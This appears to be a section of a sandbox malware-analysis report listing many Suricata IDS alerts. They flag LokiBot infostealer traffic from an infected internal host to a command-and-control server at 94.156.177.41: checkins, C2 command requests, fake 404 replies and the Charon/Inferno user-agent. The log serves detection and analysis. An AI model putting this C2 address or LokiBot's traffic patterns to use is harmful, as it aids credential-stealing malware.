Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49249 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49223 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49191 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49253 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49207 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49191 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49253 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49175
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49267 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49195
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49178 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49178 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49267
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49178 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49251 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49192
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49251 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49251 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49216 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49222
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49241 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49241 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49251 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49251 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49251
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49224 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49224 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49224 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49212 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49241 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49234 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49241 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49256 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49183 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49211
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49207 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49253 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49199 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49253 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49182 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49182 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49249 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49224 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49224 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49199 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49269 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49199 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49269 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49269 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49212 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49269 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49269 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49249 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49269
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49249 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49272 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49272 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49250 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49256 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49274 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49207 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49183 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49223 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49250 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49250 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49183 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49250
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49223
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49191
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49216 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49277 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49277 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49234 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49225 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49225 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49272 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49270 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49270 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49183 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49272 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49256
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49216
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49253
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49189
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49207
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49231 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49231 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49231 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49258 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49258 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49258 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49210 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49210 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49210 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49209 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49258 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49277 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49258 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49234 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49277 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49181
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49237
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49224
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49276
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49178 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49210 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49212
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49210 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49272 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49199
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49274 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49274 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49183 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49231 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49238 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49231 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49206 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49182 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49225 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49206 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49249
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49270 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49238 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49182 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49270 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49184 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49184 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49184 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49243
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49236 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49274
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49236 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49230 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49230 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49230 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49184 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49184 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49277 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49183
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49178 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49178
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49197 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49206
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49279 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49225 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49225 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49182 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49279 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49272
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49270 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49182
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49266 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49266 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49266 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49279
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49236 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49266 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49266 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49226 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49266
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49226 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49226 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49220 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49271 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49271 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49271 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49210
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49236 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49236 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49271 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49234 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49277
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49197 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49197 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49258
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49238 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49225
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49197 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49220 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49220 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49271 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49209 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49230 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49271
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49230 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49230
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49236
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49238 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49226 -> 94.156.177.41:80
